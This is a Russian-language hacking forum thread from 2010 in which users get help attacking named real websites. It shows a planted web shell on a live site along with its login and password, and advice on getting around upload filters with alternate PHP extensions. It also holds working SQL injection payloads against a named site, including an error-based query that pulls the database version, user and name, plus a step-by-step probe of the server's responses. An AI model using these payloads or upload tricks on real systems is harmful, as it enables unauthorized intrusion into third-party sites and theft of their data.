09.09.2010, 17:46
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Всем привет!
Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php)
Надеюсь мой ход мысли понятен!?
...хотя думается мне, ответ будет отрицательным.
|
|
|
09.09.2010, 17:48
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции?
IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...
|
|
|
|
09.09.2010, 18:08
|
|
Новичок
Регистрация: 26.08.2010
Сообщений: 2
С нами:
8269526
Репутация:
0
|
|
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?
|
|
|
|
09.09.2010, 18:09
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от molotovkeyt
http://ru.akella.com/Game.aspx?id=1%27
че дальше, кто подскажет?
не имел никогда дело с aspx-движками.
Тут нет уязвимости.
|
|
|
|
09.09.2010, 18:11
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
Сообщение от blackhat
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?
значит он там уже есть,лить в другую папку или .phtml .php3 это поробуй
|
|
|
|
09.09.2010, 18:14
|
|
Новичок
Регистрация: 26.08.2010
Сообщений: 2
С нами:
8269526
Репутация:
0
|
|
Shadrin никакого эффекта =(
|
|
|
|
09.09.2010, 19:19
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
С нами:
8388263
Репутация:
0
|
|
http://www.xvideo.ru/catalog.php?product=588+order+by+1--
помогите раскрутить инъекцию
на union select никакой реакции
|
|
|
|
09.09.2010, 19:44
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
Axel_Ustus:
http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,vers ion(),user(),database())),rAnD(0)|0)+hAvInG+miN(0) */
|
|
|
|
09.09.2010, 19:55
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Axel_Ustus:
Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:
1) При запросе "order by 2" нам возвращается sql запрос:
Код:
select categories_id from t_products_to_categories where product_id = 589 order by 2--
И мы видим, что запрашивается одно поле
2) Закроем запрос
Код:
http://www.xvideo.ru/catalog.php?product=589 -- 1
3) Попробуем написать union select после закрытия:
Код:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union select
Мы видим ошибку, следовательно union select блочится
4)
Код:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select
Ошибки нет
5)
Код:
http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1
И запрос, который нам вернулся:
Код:
select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2
Из этого следует, что тут несколько запросов, и union работать не будет) |
|
|
|
09.09.2010, 20:06
|
|
Новичок
Регистрация: 04.06.2010
Сообщений: 0
С нами:
8388263
Репутация:
0
|
|
спасибо kamaz)
мне была интересна именно причина
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
